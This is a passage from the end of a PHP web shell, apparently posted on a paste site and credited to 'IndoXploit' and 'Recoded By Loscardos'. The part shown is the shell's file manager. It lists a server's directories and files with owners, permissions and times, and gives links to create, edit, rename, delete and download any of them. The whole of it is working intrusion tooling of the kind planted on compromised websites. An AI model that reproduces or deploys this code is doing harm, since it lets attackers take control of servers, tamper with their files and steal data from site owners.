  1416. if($dirx === '..') {
  1417. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1418. } elseif($dirx === '.') {
  1419. $href = "<a href='?dir=$dir'>$dirx</a>";
  1420. } else {
  1421. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1422. }
  1423. if($dirx === '.' || $dirx === '..') {
  1424. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1425. } else {
  1426. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1427. }
  1428. echo "<tr>";
  1429. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1430. echo "<td class='td_home'><center>$dtype</center></td>";
  1431. echo "<td class='td_home'><center>-</center></th></td>";
  1432. echo "<td class='td_home'><center>$dtime</center></td>";
  1433. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1434. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1435. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1436. echo "</tr>";
  1437. }
  1438. }
  1439. } else {
  1440. echo "<font color=red>can't open directory.</font>";
  1441. }
  1442. foreach($scandir as $file) {
  1443. $ftype = filetype("$dir/$file");
  1444. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1445. $size = filesize("$dir/$file")/1024;
  1446. $size = round($size,3);
  1447. if(function_exists('posix_getpwuid')) {
  1448. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1449. $fowner = $fowner['name'];
  1450. } else {
  1451. //$downer = $uid;
  1452. $fowner = fileowner("$dir/$file");
  1453. }
  1454. if(function_exists('posix_getgrgid')) {
  1455. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1456. $fgrp = $fgrp['name'];
  1457. } else {
  1458. $fgrp = filegroup("$dir/$file");
  1459. }
  1460. if($size > 1024) {
  1461. $size = round($size/1024,2). 'MB';
  1462. } else {
  1463. $size = $size. 'KB';
  1464. }
  1465. if(!is_file("$dir/$file")) continue;
  1466. echo "<tr>";
  1467. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1468. echo "<td class='td_home'><center>$ftype</center></td>";
  1469. echo "<td class='td_home'><center>$size</center></td>";
  1470. echo "<td class='td_home'><center>$ftime</center></td>";
  1471. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  1472. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1473. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1474. echo "</tr>";
  1475. }
  1476. echo "</table>";
  1477. if(!is_readable($dir)) {
  1478. //
  1479. } else {
  1480. echo "<hr>";
  1481. }
  1482. echo "<center>Copyright IndoXploit &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=lime>Recoded By Loscardos </font></a></center>";
  1483. }
  1484. ?>
  1485. </html>
Add Comment
Please, Sign In to add comment